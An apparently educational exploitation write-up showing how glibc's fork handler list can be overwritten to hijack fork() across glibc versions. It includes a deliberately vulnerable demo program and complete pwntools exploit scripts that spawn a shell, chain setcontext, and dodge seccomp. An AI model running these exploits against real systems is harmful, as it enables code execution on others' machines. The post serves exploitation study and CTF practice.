# fork\_gadget

Some of you may be familiar with the exit handlers that are run when calling `exit()`. These are typically used to clean up before the program terminates, but they're also quite useful for attackers looking to hijack code execution. They're ideal because, by overwriting the [\_\_exit\_funcs](https://elixir.bootlin.com/glibc/glibc-2.35/source/stdlib/cxa_atexit.c#L76) array, you can specify functions to be called, along with a controlled argument. However, one downside is that, because they're such a popular target for attackers, glibc applies pointer mangling to the function pointers.

However, there are other places where handlers like these are used. One place I stumbled across while investigating the exit handlers was the fork handlers, and after some investigation I found some tricks to abuse them to convert `fork` into a constraintless one gadget.

## Cheatsheet

Below is a cheatsheet for all the tricks covered in this post:

{% embed url="<https://gist.github.com/sasha-999/bcafec8de9a5620d8b38d78b7e9693fc#file-fork_gadget_cheatsheet-py>" %}

## What are the fork handlers?

`fork` has its own handlers for multiple situations:

* `prepare_handler`
* `parent_handler`
* `child_handler`

These are stored in a single array/linked list called `fork_handlers`, which exists in a writable region of libc memory so that more handlers can be added. In each case, all of the handlers of the corresponding type are executed in a specific order. There are a few things that separate these from exit handlers:

* :white\_check\_mark: No pointer mangling.
* :x: No argument control.

So 1 step forward, and 2 steps back. However, while we don't get explicit argument control like with exit handlers, there are similar tricks to what we did in [ret2gets](/pwn-notes/pwn/rop-2.34+/ret2gets.md). To see that, let's have a closer look at `fork` across multiple versions, as the implementation of the handlers has changed, which also changes how we'd abuse them.

{% file src="/files/Kf3ClPLgA37jFvEVIR3o" %}
Files used for the demos
{% endfile %}

## 2.28-2.35

(The specific version used here is `2.35`)

Let's first have a look at what a `fork_handler` looks like:

<figure><img src="/files/qaxu0qUInTYyTuU5L8wl" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.35/source/include/register-atfork.h#L23">fork_handler</a></p></figcaption></figure>

* `prepare_handler`: Handlers to prepare the process to `fork`, so they're run *before* the `fork`.
* `parent_handler`: Handlers run as the *parent* after the `fork`.
* `child_handler`: Handlers run as the *child* after the `fork`.
* `dso_handle`: A unique id to identify which binary/shared library registered this handler.

These are stored in an array called `fork_handlers`, which is defined as:

<figure><img src="/files/hA6bcYDa9BdfOLXzVfKU" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.35/source/posix/register-atfork.c#L22">fork_handlers</a></p></figcaption></figure>

The way this definition works is by stating a few "parameters" using macros, then including [malloc/dynarray-skeleton.c](https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/dynarray-skeleton.c), which then defines a struct called `fork_handler_list`, plus a bunch of helper functions for this struct.

<figure><img src="/files/teL89fFaMIFHU1fXwtHV" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/dynarray-skeleton.c#L125">generic struct definition</a></p></figcaption></figure>

These `dynarray` structures are dynamically allocated arrays, which can resize if needed. Usually they have an initial buffer before it goes to the heap. Evaluating this yields:

```c
struct fork_handler_list {
        size_t used;
        size_t allocated;
        struct fork_handler* array;
        struct fork_handler scratch[48];
};
```
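To make the offsets used later in the exploit helpers concrete, the layout can be mirrored with `ctypes`. This is only a sketch: the class names `ForkHandler` and `ForkHandlerList` are made up for illustration, and pointers are modelled as plain 64-bit integers, so it assumes an x86-64 target.

```python
import ctypes

class ForkHandler(ctypes.Structure):
    # Field order follows the fork_handler struct described above (2.28-2.35).
    _fields_ = [
        ("prepare_handler", ctypes.c_uint64),
        ("parent_handler", ctypes.c_uint64),
        ("child_handler", ctypes.c_uint64),
        ("dso_handle", ctypes.c_uint64),
    ]

class ForkHandlerList(ctypes.Structure):
    _fields_ = [
        ("used", ctypes.c_uint64),        # number of entries in use
        ("allocated", ctypes.c_uint64),   # capacity of the backing buffer
        ("array", ctypes.c_uint64),       # struct fork_handler *
        ("scratch", ForkHandler * 48),    # inline buffer used before the heap
    ]

print(hex(ctypes.sizeof(ForkHandler)))       # size of one entry
print(hex(ForkHandlerList.array.offset))     # where the array pointer lives
print(hex(ForkHandlerList.scratch.offset))   # where the inline entries start
```

The entry size and the offset of `scratch` are the two numbers the forging helpers further down rely on.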

`fork` is defined as follows:

<figure><img src="/files/ajtid5YNXpoF6k74ZZWL" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.35/source/posix/fork.c#L40">__libc_fork</a></p></figcaption></figure>

Here we call `__run_fork_handlers` with [atfork\_run\_prepare](https://elixir.bootlin.com/glibc/glibc-2.35/source/include/register-atfork.h#L37), indicating it wants to execute the `prepare` handlers.

<figure><img src="/files/VmS8YegE3GxEezJdYX3W" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.35/source/posix/register-atfork.c#L107">__run_fork_handlers</a></p></figcaption></figure>

So now it will go through the array starting from the last element (for backwards compatibility reasons), executing each `prepare_handler` if it exists. The functions `fork_handler_list_size` and `fork_handler_list_at` are some of the methods automatically defined when we defined `fork_handler_list`; they get the length (`used`) and index the array respectively. Locking may also be used if there are multiple threads running.
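The iteration order matters later when chaining several handlers, so here is a small Python model of the loop. It is a simplification under my own assumptions (handlers are dictionaries, "calling" one just records its name, and locking is ignored), not a translation of the glibc source.

```python
def run_prepare_handlers(handlers):
    """Model of the prepare loop: walk the array from the last entry to the first."""
    calls = []
    i = len(handlers)              # plays the role of `used`
    while i > 0:
        prepare = handlers[i - 1].get("prepare_handler")
        if prepare is not None:    # NULL handlers are skipped
            calls.append(prepare)
        i -= 1
    return calls

registered = [
    {"prepare_handler": "first_registered"},
    {"prepare_handler": None},
    {"prepare_handler": "last_registered"},
]
order = run_prepare_handlers(registered)
print(order)
```

The most recently registered handler runs first, which is why the forging helpers below store the functions in reverse.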

### So what?

At first glance, taking control of code execution doesn't seem to be very doable, mainly due to the fact that we seemingly have no argument control. However, if we dig deeper, and look at the disassembly, we'll notice something interesting.

<figure><img src="/files/V7cOeTPd22MwaChNacNE" alt=""><figcaption><p><code>__run_fork_handlers</code></p></figcaption></figure>

<figure><img src="/files/qupfNEZDDqKGByAJcYqg" alt=""><figcaption><p><code>__run_fork_handlers+288</code>: Locking <code>atfork_lock</code></p></figcaption></figure>

First it checks the first argument `edi`: if it's `0`, it should run the `prepare` handlers. It then checks whether it should use locking; if so, it jumps to `+288`, where it takes the lock, then resumes by jumping back to `+23`.

But then something interesting happens. `[fork_handlers]` is loaded into `rbp` (which corresponds to `fork_handlers->used`), then is loaded into `rdi`. How interesting! It then goes on to call the `prepare_handler`:

<figure><img src="/files/gGDANIS9AFS405J9nG2l" alt=""><figcaption><p><code>__run_fork_handlers+84</code>: Decrements <code>rbp</code> (the index)</p></figcaption></figure>

<figure><img src="/files/VOyzggZlQBUsWbAHE8zm" alt=""><figcaption><p><code>__run_fork_handlers+48</code>: Calls the <code>prepare_handler</code></p></figcaption></figure>

So theoretically, controlling the field `used` could grant us `rdi` control.

### Why does this happen?

The reason for this is the [same reason](/pwn-notes/pwn/rop-2.34+/ret2gets.md#io_stdfile_0_lock-in-rdi) why [ret2gets](/pwn-notes/pwn/rop-2.34+/ret2gets.md) works. Let's go back to `+84` (when the index is decremented):

<figure><img src="/files/ekQx0fjAPSWqVPCC0wBa" alt=""><figcaption><p><code>__run_fork_handlers+84</code>: Calling <code>__libc_dynarray_at_failure</code>?</p></figcaption></figure>

`+91` checks that the index `rbp` is within the bounds of the array (less than `used`). If it's not, it goes on to call [\_\_libc\_dynarray\_at\_failure](https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/dynarray_at_failure.c#L23), interestingly setting a second argument, but not a first? Well, that's because it already set the first argument when `used` was loaded. It could load `used` into any register, but it chooses `rdi` because, if this error does happen, `used` is already where the first argument needs to be and doesn't have to be moved again.

<figure><img src="/files/jPJM5YKZXqzWBdUNcNuh" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/dynarray-skeleton.c#L250">fork_handler_list_at</a>: Checks the bounds, and calls the failure function with the size and index.</p></figcaption></figure>

### Exploitation

```c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

void setup() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
}

int main() {
    setup();

    printf("%p\n", &fgets);
    printf("Enter address, size and data: ");
    unsigned long addr, size;
    scanf("%zu %zu ", &addr, &size);
    fgets((void*)addr, size, stdin);
    fork();
}
```

To demonstrate this, we'll use the ~~very realistic application~~ attack scenario above, where we have a libc leak, an arbitrary write, and a call to `fork` we want to hijack.

We can start by writing some basic methods to create the structures:

```python
def header(addr, size):
    return flat({
        0x00: size,
        # we don't need to control allocated
        0x10: addr
    })

def handler_array(*funcs):
    assert funcs
    data = bytearray(0x20*len(funcs) - 0x18)
    for i, func in zip(range(0, len(data), 0x20), funcs[::-1]):
        data[i:i+8] = p64(func)
    return data
```

So we can use `handler_array(libc.sym.system)` to craft an array that will execute `system`, but we now need to control `rdi`. We can do this by setting `used` to some pointer to `/bin/sh`. However, if we use a regular address to point to the handler array, the large `used` field will cause it to access invalid memory when it goes to fetch the last handler. So if we need `used` to be an address, why don't we just alter the address of the handler array? As long as

```c
fork_handlers->array[fork_handlers->used-1]
```

points to our handler, then it'll work. We can forge such an address as follows:

```python
addr = (addr - (size-len(funcs))*0x20) % (1<<64)
```

Of course this will create an "address" that's complete nonsense, but that doesn't matter, as it won't access the start of the array (unless [\_\_register\_atfork](https://elixir.bootlin.com/glibc/glibc-2.35/source/posix/register-atfork.c#L34) or [\_\_unregister\_atfork](https://elixir.bootlin.com/glibc/glibc-2.35/source/posix/register-atfork.c#L75) is used). Putting this all together, we can arrive at the following exploit:

```python
#!/usr/bin/python3
from pwn import *

e = context.binary = ELF('vuln')
libc = ELF('libc', checksec=False)

p = e.process()

fgets = int(p.recvline(), 16)
log.info(f"fgets: {hex(fgets)}")

libc.address = fgets - libc.sym.fgets
log.info(f"libc: {hex(libc.address)}")

def header(addr, size):
    return flat({
        0x00: size,
        0x10: addr
    })

def handler_array(*funcs):
    assert funcs
    data = bytearray(0x20*len(funcs) - 0x18)
    for i, func in zip(range(0, len(data), 0x20), funcs[::-1]):
        data[i:i+8] = p64(func)
    return data

def forge_split(addr, *funcs, rdi=None):
    array = handler_array(*funcs)
    if rdi is not None:
        size = rdi
        assert size >= len(funcs)
        addr = (addr - (size-len(funcs))*0x20) % (1<<64)
    else:
        size = len(funcs)
    return header(addr, size), array

def forge(addr, *funcs, rdi=None):
    hdr, arr = forge_split(addr+0x18, *funcs, rdi=rdi)
    return hdr + arr

addr = libc.sym.fork_handlers
data = forge(addr, libc.sym.system, rdi=next(libc.search(b"/bin/sh\x00")))

assert b"\n" not in data
p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)

p.interactive()
```
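The address arithmetic inside `forge_split` can be checked in isolation, without pwntools. The sketch below uses made-up addresses and two helper names of my own (`fake_array_base`, `entry_address`); it only demonstrates that the wrapped-around base pointer makes `array[used-1]` land on the forged entry.

```python
MASK = (1 << 64) - 1
ENTRY_SIZE = 0x20   # sizeof(struct fork_handler) on 2.28-2.35

def fake_array_base(real_array, n_funcs, used):
    """Base pointer such that the last n_funcs entries overlap real_array."""
    return (real_array - (used - n_funcs) * ENTRY_SIZE) & MASK

def entry_address(base, index):
    """Address computed for array[index], with 64-bit wraparound."""
    return (base + index * ENTRY_SIZE) & MASK

# Hypothetical example values, not taken from a real process.
real_array = 0x7ffff7e1b698   # where the forged entries really live
binsh = 0x7ffff7dd8698        # value wanted in rdi, so also the value of `used`

base = fake_array_base(real_array, 1, binsh)
first_called = entry_address(base, binsh - 1)
print(hex(base), hex(first_called))
```

The base itself is a nonsense pointer, but the only index dereferenced first is `used-1`, which resolves back to the real array.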

### Is that all we can do?

This is the basic payload, but we can do more than just this. Take for example, a case where seccomp is in place, and we don't have access to `execve`, meaning calling `system` is useless now! Is that all we can do with a function call with a controlled argument? ~~Yes, thanks for reading.~~

This is where `setcontext` comes in! I covered this already [here](/pwn-notes/pwn/setcontext.md), but basically this allows us to get ROP through the use of a function resembling the `sigreturn` syscall. We can substitute this in as follows:

```python
def setcontext(regs, addr):
    frame = SigreturnFrame()
    for reg, val in regs.items():
        setattr(frame, reg, val)
    # needed to prevent SEGFAULT
    setattr(frame, "&fpstate", addr+0x1a8)
    fpstate = {
        0x00: p16(0x37f),   # cwd
        0x02: p16(0xffff),  # swd
        0x04: p16(0x0),     # ftw
        0x06: p16(0xffff),  # fop
        0x08: 0xffffffff,   # rip
        0x10: 0x0,          # rdp
        0x18: 0x1f80,       # mxcsr
    }
    return flat({
        0x00: bytes(frame),
        # 0xf8: 0           # end of SigreturnFrame
        0x128: 0,           # uc_sigmask
        0x1a8: fpstate,     # fpstate
    })

addr = libc.sym.fork_handlers

addr_ctx = addr+0x20
data = forge(addr, libc.sym.setcontext, rdi=addr_ctx) + setcontext({
    "rdi": next(libc.search(b"/bin/sh\x00")),
    "rsi": 0,
    "rdx": 0,
    "rip": libc.sym.execve,
    "rsp": addr_ctx+0x200
}, addr_ctx)
assert b"\n" not in data
```

For demo purposes, I'm just executing `execve`, but you can do much more with `setcontext`.
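The choice of `addr_ctx = addr+0x20` follows from the size of the forged header plus a single truncated entry. A stdlib-only sketch of the two helpers makes that visible; it is not a drop-in replacement (it zero-fills the gaps where `flat` would use its filler pattern), and the `0x41…`/`0x42…` values are placeholders.

```python
import struct

def header(addr, used):
    # used at 0x00, allocated at 0x08 (left as zero here), array pointer at 0x10
    return struct.pack("<QQQ", used, 0, addr)

def handler_array(*funcs):
    # Only prepare_handler of each 0x20-byte entry is filled in, and the final
    # entry is truncated to its first 8 bytes. Entries are stored in reverse
    # call order because the loop walks the array backwards.
    data = bytearray(0x20 * len(funcs) - 0x18)
    for i, func in enumerate(reversed(funcs)):
        data[i * 0x20:i * 0x20 + 8] = struct.pack("<Q", func)
    return bytes(data)

forged = header(0x4141414141414141, 1) + handler_array(0x4242424242424242)
print(hex(len(forged)))
```

With one handler the forged structure is exactly `0x20` bytes long, so anything appended to it starts at `addr+0x20`.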

### gets

Both of these examples require the `/bin/sh` string or the `SigreturnFrame` to already exist in memory, or be a part of the arbitrary write. But what if we don't have such a luxury? Well, since `rdi` will be controlled for every function call, we can use `gets` to write data to the argument, before using it for `system`:

```python
addr = libc.sym.fork_handlers
data = forge(addr, libc.sym.gets, libc.sym.system, rdi=addr+0x200)
assert b"\n" not in data
# could also be any command we wish
extra_data = b"/bin/sh"

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)

if extra_data:
    p.sendline(extra_data)

p.interactive()
```

Or `setcontext`:

```python
addr = libc.sym.fork_handlers

addr_ctx = addr+0x20
data = forge(addr, libc.sym.gets, libc.sym.setcontext, rdi=addr_ctx)
assert b"\n" not in data

extra_data = setcontext({
    "rdi": next(libc.search(b"/bin/sh\x00")),
    "rsi": 0,
    "rdx": 0,
    "rip": libc.sym.execve,
    "rsp": addr_ctx+0x200,
}, addr_ctx)
assert b"\n" not in extra_data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)

if extra_data:
    p.sendline(extra_data)

p.interactive()
```
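The `assert b"\n" not in ...` checks exist because both `fgets` and `gets` stop reading at a newline. When one of them fails, it helps to know which byte is responsible. The helper below is a hypothetical convenience of mine, not part of the exploit, and the address in the example is made up.

```python
import struct

def first_bad_byte(payload, bad=b"\n"):
    """Return the offset of the first byte that would end the read early, or None."""
    for offset, byte in enumerate(payload):
        if byte in bad:
            return offset
    return None

# A made-up address whose second byte happens to be 0x0a.
payload = struct.pack("<Q", 0x7ffff7e10a40)
print(first_bad_byte(payload))
```

If an offset comes back, shifting the forged structure or the context by a few bytes is usually enough to get rid of the offending byte.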

### Seccomp strikes back!

Our good old ~~friend~~ enemy seccomp isn't always easily defeated by `setcontext`, because there's a nuisance I have yet to cover. If we have another look at `setcontext`:

<figure><img src="/files/Suu2qJzUUEwpgNEaUlqQ" alt=""><figcaption><p><code>setcontext</code>: Calling <code>sigprocmask</code> syscall.</p></figcaption></figure>

We see that it executes a syscall *before* it sets the context, with syscall number `0xe`. This is `sigprocmask`, and while it may not be on the radar of any blacklists, it could be easily left out of a whitelist (like `seccomp`'s strict mode), meaning this could invoke `seccomp`'s wrath.

What if we tried to skip the syscall? It's a good suggestion, but a wrench in the plan here is the fact that it restores the pointer to the context in `rdx`, not `rdi`, so we'd need to control `rdx` somehow.

Wouldn't it be nice if we could convert our current `rdi` control into `rdx` control, given that `rdx` isn't used by `__run_fork_handlers`? Well, it turns out there is a gadget that can do just that!

<figure><img src="/files/KO7l9vw9NrbXTQ5Tv7d0" alt=""><figcaption><p><code>mov rdx, rdi</code> gadget</p></figcaption></figure>

Exactly one in fact. However if you're anything like me (~~and I surely hope not~~), you'd wonder where this came from, and is this something that's likely to come up across multiple versions of libc, because it would be nice if our techniques were portable(ish).

<figure><img src="/files/uNhoSONpeFz6X37gqF4N" alt=""><figcaption><p><code>x/10i 0xc5044</code></p></figcaption></figure>

<figure><img src="/files/fMcfc4JyPKeBfs17yAt5" alt=""><figcaption><p><code>__memset_erms</code></p></figcaption></figure>

It seems to belong to a function `__memset_erms`, which in hindsight makes sense. It explains the `rep stos` instruction: it's filling the buffer with the character `al`. And since `rep stos` increments `rdi`, it needs to save a copy, so that it can return that original pointer, as that's the [defined behaviour](https://man7.org/linux/man-pages/man3/memset.3.html#RETURN_VALUE) of `memset`.

But why did it compile like this, and why is `rdx` used, surely this could change, right? Well let's find out:

<figure><img src="/files/ewAGRLtcaHdXv02hhjCg" alt=""><figcaption><p>Using <code>list</code> to find where it's defined.</p></figcaption></figure>

<figure><img src="/files/x4yIkRcm46kNGJVVcfH2" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.35/source/sysdeps/x86_64/multiarch/memset-vec-unaligned-erms.S#L150">__memset_erms</a></p></figcaption></figure>

Turns out the reason it compiled that way is that that's exactly how libc wanted it: it's written in assembly language (`.S` is a common extension for assembly language files). From what I could see, this behaviour is also consistent across many versions, probably because there's no real reason to change it:

* It's simple, so not much to change in the first place.
* If it ain't broke, don't fix it.
* It's not actually used, it's just used for performance measuring.

Fantastic, we have a `mov rdx, rdi` gadget! But there's one final snag: we ideally want to set `rcx` or `rdx` to `0` before this gadget executes, so that `rep stos` finishes immediately (i.e. doesn't run).

<figure><img src="/files/UKsEtEveqauHuperzZ9w" alt=""><figcaption><p>Where to jump to + preconditions</p></figcaption></figure>

<figure><img src="/files/9BJ5P0uBPKYsJYoYCxSm" alt=""><figcaption><p>Null <code>rcx</code> gadgets</p></figcaption></figure>

<figure><img src="/files/NrKAl8JsAaF2xgmemB2M" alt=""><figcaption><p>Null <code>rdx</code> gadgets</p></figcaption></figure>

Putting this all together, we arrive at the following:

```python
addr = libc.sym.fork_handlers

addr_ctx = addr+0x100
data = forge(addr, libc.sym.gets, libc.address+0xa85d8, libc.sym.__memset_erms+13, libc.sym.setcontext+45, rdi=addr_ctx)
assert b"\n" not in data

extra_data = setcontext({
    "rdi": next(libc.search(b"/bin/sh\x00")),
    "rsi": 0,
    "rdx": 0,
    "rip": libc.sym.execve,
    "rsp": addr_ctx+0x200
}, addr_ctx)
assert b"\n" not in extra_data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)
p.sendline(extra_data)

p.interactive()
```
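To see why the order of the four handlers matters, here is a toy register model of the chain. It rests on several assumptions of mine: `rdi` is reloaded with `used` before every call, the `__memset_erms` entry point used is the one starting at `mov rcx, rdx` (so a gadget zeroing `rdx` comes first), and no handler touches registers other than the ones shown. Entering at `mov rdx, rdi` with `rcx` already zeroed would behave the same in this model.

```python
def run_chain(used, chain):
    """Call each modelled handler in order, reloading rdi with `used` before each call."""
    regs = {"rdi": 0, "rcx": 0x1337, "rdx": 0x1337}   # arbitrary junk to start with
    events = []
    for handler in chain:
        regs["rdi"] = used
        handler(regs, events)
    return regs, events

def gets(regs, events):
    events.append(("gets writes context at", regs["rdi"]))

def null_rdx(regs, events):
    regs["rdx"] = 0

def memset_erms_tail(regs, events):
    regs["rcx"] = regs["rdx"]          # mov rcx, rdx
    regs["rdx"] = regs["rdi"]          # mov rdx, rdi
    if regs["rcx"] != 0:               # rep stosb stores rcx bytes at rdi
        events.append(("stosb clobbers", regs["rdi"], regs["rcx"]))
    regs["rcx"] = 0

def setcontext_after_syscall(regs, events):
    events.append(("setcontext restores from", regs["rdx"]))

CTX = 0x7ffff7e1b798   # hypothetical context address
regs, events = run_chain(CTX, [gets, null_rdx, memset_erms_tail, setcontext_after_syscall])
print(events)
```

Dropping `null_rdx` from the chain makes the model record a `stosb clobbers` event, which corresponds to `rep stos` overwriting the context that `gets` just wrote.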

### 2.28-2.29

There's a weird edge case that I found with `2.28-2.29`, which seems to coincide with the versions that didn't have the `do_locking` argument (which was added in [2.30](https://elixir.bootlin.com/glibc/glibc-2.30/source/nptl/register-atfork.c#L110)).

<figure><img src="/files/v9wf3TD8Ti2vGpodj2BE" alt=""><figcaption><p><code>2.29</code> first <code>prepare_handler</code> call</p></figcaption></figure>

Above we see that the `used` field is loaded into `rax`, but not into `rdi`. But after the first call:

<figure><img src="/files/YnSMQ2yj2reJiTUgTZbC" alt=""><figcaption><p><code>2.29</code> second <code>prepare_handler</code> call</p></figcaption></figure>

`used` *is* loaded into `rdi`. Weird...

I can't quite explain why this happens, but this is more just a word of warning, that this isn't an exact science. If you find this happening, you can always just start by doing a `ret` to get past the first call, which would also be compatible with `2.30+`.

And if it doesn't happen at all?

Well, `rdi` shouldn't be used by anything else if it's not used for `used`, so [ret2gets](/pwn-notes/pwn/rop-2.34+/ret2gets.md) would also be a possibility, however I am yet to test it.

## 2.36+

(The specific version used here is `2.39`)

You'll have noticed that the previous section was specifically for `2.28-2.35`. This is because the implementation of `fork_handlers` changes throughout the versions. So, what's changed now?

Well, not much actually. Firstly, the `fork_handler` struct has a new field: `id`

<figure><img src="/files/kbGQ4Jc2cLTKLXi0uWZB" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.39/source/include/register-atfork.h#L23">fork_handler</a></p></figcaption></figure>

And a separate function for running `prefork` handlers has been created:

<figure><img src="/files/4BPSEVQMzxnsOZrJhIFr" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.39/source/posix/fork.c#L40">__libc_fork</a></p></figcaption></figure>

The function for running `prefork` handlers isn't much different either:

<figure><img src="/files/ww5ncZMXkgUEDNq2Zu25" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.39/source/posix/register-atfork.c#L128">__run_prefork_handlers</a></p></figcaption></figure>

The main addition is the use of `id`. What the comments here seem to imply is that each handler now has a unique `id`, which increments each time a new one is added, so handlers added later have a larger `id`. Due to the different locking pattern here, handlers could be registered and/or de-registered while a `prepare_handler` is executing, so the loop ensures that only handlers that were registered before the one that just ran are executed, skipping any with a *higher* `id`.
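A small model of this skipping logic shows what it means for a forged array. This is my own simplification: handlers are `(name, id)` tuples, locking is ignored, and I'm assuming the comparison skips entries whose `id` is greater than or equal to the one that just ran.

```python
def run_prefork_handlers(handlers):
    """handlers: list of (name, id) tuples in array order; returns names in call order."""
    called = []
    i = len(handlers)
    while i > 0:
        name, current_id = handlers[i - 1]
        called.append(name)
        i -= 1
        # Skip entries that are not older than the handler that just ran.
        while i > 0 and handlers[i - 1][1] >= current_id:
            i -= 1
    return called

increasing = [("c", 0), ("b", 1), ("a", 2)]
all_zero = [("c", 0), ("b", 0), ("a", 0)]
print(run_prefork_handlers(increasing))
print(run_prefork_handlers(all_zero))
```

With strictly increasing ids every entry runs, whereas an array with identical ids stops after the first call.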

For us, all this changes is that the structure of `fork_handler` is different, and we just need to include an `id` field that increases with each handler. The updated helpers are as follows:

```python
def header(addr, size):
    return flat({
        0x00: size,
        0x10: addr
    })

def handler_array(*funcs):
    assert funcs
    data = bytearray(0x28*len(funcs))
    for i, func in enumerate(funcs[::-1]):
        off = i*0x28
        data[off:off+8] = p64(func)
        data[off+0x20:off+0x28] = p64(i)
    return data

def forge_split(addr, *funcs, rdi=None):
    array = handler_array(*funcs)
    if rdi is not None:
        size = rdi
        assert size >= len(funcs)
        addr = (addr - (size-len(funcs))*0x28) % (1<<64)
    else:
        size = len(funcs)
    return header(addr, size), array

def forge(addr, *funcs, rdi=None):
    hdr, arr = forge_split(addr+0x18, *funcs, rdi=rdi)
    return hdr + arr
```

### Revenge of the seccomp!

While these changes don't affect the regular cases for `system("/bin/sh")` or `setcontext`, it (indirectly) affects the `setcontext` case where we need to skip `sigprocmask`. In the version of glibc I used for the demo, `rdx` is used by `__run_prefork_handlers`:

<figure><img src="/files/hn4CFcGmRfFEZwzOrljE" alt=""><figcaption><p>After <code>prepare_handler</code> call.</p></figcaption></figure>

Here we see at `+128` that `rdx=5*r14`, where `r14` is `sl` (the number of handlers). `rdx` then gets multiplied by `8`, which ultimately means `r14` got multiplied by `40`/`0x28`, (the size of `fork_handler`). This is in preparation for the loop where it checks the `id` fields, which is why it actually points to the previous handler's `id` field (`-0x30` instead of `-0x28`).

In this case, we can actually set `used` to a value that, when multiplied by 5, points to a context. This will make `rdi` a junk value, which means you can't use `gets` to populate the context (RIP), but apart from that, it's no problem!

```python
ret = ROP(libc).find_gadget(["ret"]).address

addr = libc.sym.fork_handlers

addr_ctx = addr+0x100
addr_ctx += (-addr_ctx) % 5
rdi = addr_ctx // 5

data = forge(addr, ret, libc.sym.setcontext+45, rdi=rdi)
data = data.ljust(addr_ctx-addr, b"X")
data += setcontext({
    "rdi": next(libc.search(b"/bin/sh\x00")),
    "rsi": 0,
    "rdx": 0,
    "rip": libc.sym.execve,
    "rsp": addr_ctx+0x200
}, addr_ctx)
assert b"\n" not in data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)
p.interactive()
```
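The two lines that adjust `addr_ctx` just round it up to a multiple of 5 so the division is exact. A standalone check of that arithmetic, using a hypothetical helper name (`align_for_rdx`) and a made-up address:

```python
def align_for_rdx(addr_ctx, factor=5):
    """Round addr_ctx up to a multiple of `factor` and return (addr_ctx, used)."""
    addr_ctx += (-addr_ctx) % factor
    return addr_ctx, addr_ctx // factor

# Hypothetical address, for illustration only.
original = 0x7ffff7e1b798
ctx, used = align_for_rdx(original)
print(hex(ctx), hex(used), hex(used * 5))
```

At most 4 bytes of padding are added, which is what the `ljust` call in the exploit fills in.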

## 2.27 and prior

(The specific version used here is `2.27`)

You may be wondering why I'm ending with the earliest implementation. This is because the later versions are more trivial, both in how `fork_handlers` is implemented and in how they're exploited: here we no longer have the `rdi` control trick through the `used` field.

`fork_handler` is now defined as:

<figure><img src="/files/yrAaQ22v5OS9s8h3niw0" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.27/source/sysdeps/nptl/fork.h#L31">fork_handler</a></p></figcaption></figure>

A few more fields than before:

* `next`: Points to next handler, as `__fork_handlers` is now a singly linked list.
* `refcntr`: Reference count of this handler.
* `need_signal`: Unused in `fork`, so we'll ignore it.

We're no longer using a `dynarray`, so there is no `used` field to control to gain `rdi` control (cringe). Let's have a look at `fork` then:

<figure><img src="/files/BSZO2vdWCEWgeNyM09Yv" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.27/source/sysdeps/nptl/fork.c#L48">__libc_fork</a></p></figcaption></figure>

Not much so far: it just checks `THREAD_SELF` to see whether the process is multi-threaded. There's also no separate function for handling the fork handlers anymore: it's incorporated into `fork` itself.

<figure><img src="/files/8kxoaERXMzGlcfEY0isa" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.27/source/sysdeps/nptl/fork.c#L65">__libc_fork</a>: Access <code>__fork_handlers</code></p></figcaption></figure>

First it needs to access the root of the linked list of handlers: `__fork_handlers`. However, since the process could be multi-threaded ~~and they didn't discover locking yet~~, it needs to do it in a thread-safe way (hence the weirdness with `atomic_full_barrier` etc.), but the gist is that it will grab `__fork_handlers` if it exists, and (atomically) increment the `refcntr` to claim ownership of it, ensuring it doesn't get freed while it's in use here.

{% hint style="info" %}
A lock doesn't seem to be needed, as the `fork_handler` entries are constant (besides `refcntr`, which is handled atomically, therefore not susceptible to racing). While it does work, the code with locking is just nicer.
{% endhint %}

<figure><img src="/files/ozfP0srjQwNhQO1WavDo" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.27/source/sysdeps/nptl/fork.c#L92">__libc_fork</a>: Executing <code>prepare_handler</code>'s</p></figcaption></figure>

This now seems familiar, but instead of accessing an array, it's cycling through a linked list. It also saves the handlers it uses, so that it can run the same ones later for `parent_handler` and `child_handler`. To do this, it needs to claim ownership, so it increments the `refcntr`.

Importantly, there are no function calls with arguments present here, except for [alloca](https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/alloca.h#L35) (compiler builtin) and [atomic\_increment](https://elixir.bootlin.com/glibc/glibc-2.27/source/sysdeps/x86_64/atomic-machine.h#L282) (`asm` block). So unlike `2.28+`, there's no `rdi` control, because no functions (with a first argument) are called.

We can write methods to forge a `fork_handler` list as follows:

```python
def forge(addr, *funcs):
    assert funcs
    data = b""
    for i, func in enumerate(funcs):
        nxt = addr+len(data)+0x30
        data += flat({
            # every entry links to the one after it; the last one ends the list
            0x00: nxt if i != len(funcs)-1 else 0,
            0x08: func,
            0x28: p32(1),
        }, length=0x30)
    return data

def forge_packed(addr, *funcs, smallest=False):
    assert funcs
    if smallest:
        # some refcntrs are outside our data
        # (except the first one, which we need to control)
        # these will be incremented, and potentially corrupt some memory
        # be careful when using this
        size = max(0x28+4, 0x10*len(funcs))
    else:
        # all refcntrs are contained in our data
        size = 0x28 + 0x10*len(funcs) - 0xc
    data = bytearray(size)
